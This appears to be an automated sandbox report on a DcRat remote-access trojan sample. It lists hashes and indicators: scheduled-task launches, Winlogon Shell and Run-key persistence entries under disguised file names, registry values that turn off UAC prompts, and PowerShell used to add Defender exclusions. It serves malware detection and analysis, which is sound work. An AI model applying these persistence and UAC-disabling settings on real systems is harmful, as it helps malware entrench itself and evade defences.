dcrat | 2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240729-en
resource tags

arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
submitted
05-11-2024 21:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Size

1.2MB
MD5

477211148933cc41d67087078f70cd58
SHA1

3a931ffa7e536bd381c5fb46ebb5fd93b05bb2ec
SHA256

2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6
SHA512

76396f20ca86c749a14510c8ae2ab03042867127956e1aacc5765c933471e1987b759122f2d90c1b87392d26e12329519dfac8b0a19692c0ec07288190a91cda
SSDEEP

24576:bJlmUJyTmqFOGfeRIvZ6+adOSMZgrWoIaWrcX:OvU+a/rSro

Score

10^/10

dcrat evasion execution infostealer persistence rat trojan

Malware Config

Signatures

DcRat 49 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

description	ioc	pid	Process
		2708	schtasks.exe
		840	schtasks.exe
		568	schtasks.exe
		3060	schtasks.exe
		1856	schtasks.exe
		304	schtasks.exe
		1020	schtasks.exe
		2192	schtasks.exe
		2940	schtasks.exe
		1668	schtasks.exe
		1524	schtasks.exe
		2504	schtasks.exe
		436	schtasks.exe
		2976	schtasks.exe
		2764	schtasks.exe
		2368	schtasks.exe
		2608	schtasks.exe
		1504	schtasks.exe
		2516	schtasks.exe
		2664	schtasks.exe
		2704	schtasks.exe
		2248	schtasks.exe
		3004	schtasks.exe
		1604	schtasks.exe
		1804	schtasks.exe
		1500	schtasks.exe
		2380	schtasks.exe
		2148	schtasks.exe
		1536	schtasks.exe
		2684	schtasks.exe
		1864	schtasks.exe
		2276	schtasks.exe
		1004	schtasks.exe
		3052	schtasks.exe
		3036	schtasks.exe
		2156	schtasks.exe
		2212	schtasks.exe
		1068	schtasks.exe
		2288	schtasks.exe
		1592	schtasks.exe
		1384	schtasks.exe
		316	schtasks.exe
		896	schtasks.exe
		2460	schtasks.exe
		2668	schtasks.exe
		3028	schtasks.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA		2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
		2428	schtasks.exe
		2196	schtasks.exe

Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 16 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\", \"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\", \"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\dwm.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\", \"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Idle.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\services.exe\", \"C:\\Users\\Default\\Desktop\\dllhost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\Idle.exe\", \"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\dwm.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\", \"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\", \"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Idle.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\", \"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Idle.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\services.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\", \"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Idle.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\services.exe\", \"C:\\Users\\Default\\Desktop\\dllhost.exe\", \"C:\\Program Files\\Internet Explorer\\it-IT\\Idle.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\MSOCache\\All Users\\{90140000-001B-0409-0000-0000000FF1CE}-C\\audiodg.exe\", \"C:\\MSOCache\\All Users\\wininit.exe\", \"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\", \"C:\\Program Files (x86)\\Microsoft Office\\Document Themes 14\\Theme Effects\\winlogon.exe\", \"C:\\Windows\\Tasks\\services.exe\", \"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\", \"C:\\Windows\\system\\wininit.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\", \"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\", \"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\", \"C:\\Program Files\\Internet Explorer\\en-US\\dwm.exe\", \"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Idle.exe\", \"C:\\Program Files (x86)\\Microsoft Visual Studio 8\\SDK\\services.exe\", \"C:\\Users\\Default\\Desktop\\dllhost.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe

Process spawned unexpected child process 48 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2668	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3028	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2288	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2684	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2708	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2664	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2704	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	840	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1864	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1856	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	304	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2276	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2504	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	436	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2248	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2976	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3004	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2764	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2368	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1604	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2940	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1004	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3052	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2380	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	568	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3060	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1020	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2156	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2428	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1592	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2192	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2148	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2196	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1384	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	316	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	896	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2608	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1536	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1668	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1524	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1504	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2212	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1068	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2516	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2460	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3036	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1804	2768	schtasks.exe	30
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1500	2768	schtasks.exe	30

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	services.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe

DCRat payload 6 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral1/memory/2296-1-0x0000000000820000-0x0000000000952000-memory.dmp	dcrat
behavioral1/files/0x002f000000017530-22.dat	dcrat
behavioral1/files/0x0007000000019667-100.dat	dcrat
behavioral1/files/0x0007000000019cca-113.dat	dcrat
behavioral1/files/0x0008000000018766-224.dat	dcrat
behavioral1/memory/2960-226-0x0000000001180000-0x00000000012B2000-memory.dmp	dcrat

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2312	powershell.exe
1684	powershell.exe
2832	powershell.exe
2944	powershell.exe
2876	powershell.exe
2064	powershell.exe
840	powershell.exe
584	powershell.exe
1416	powershell.exe
2684	powershell.exe
2204	powershell.exe
1452	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2960	services.exe

Adds Run key to start application 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\Idle.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Windows\\system\\wininit.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\MSOCache\\All Users\\{90140000-0117-0409-0000-0000000FF1CE}-C\\Access.en-us\\lsass.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\Program Files\\Internet Explorer\\en-US\\dwm.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Internet Explorer\\it-IT\\Idle.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dwm = "\"C:\\MSOCache\\All Users\\{90140000-0115-0409-0000-0000000FF1CE}-C\\1033\\dwm.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winlogon = "\"C:\\Program Files\\Windows Defender\\es-ES\\winlogon.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost = "\"C:\\Users\\Default\\Desktop\\dllhost.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Program Files\\Internet Explorer\\it-IT\\Idle.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6 = "\"C:\\Windows\\ModemLogs\\2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Windows\\Tasks\\services.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\spoolsv = "\"C:\\Recovery\\3a99bb82-4e15-11ef-8354-cae67966b5f6\\spoolsv.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Reference Assemblies\\Microsoft\\services.exe\""	2e18c0635a5593a2959b9a7c47d1145dd7115142013e4b0d6b4f931e63590fd6.exe
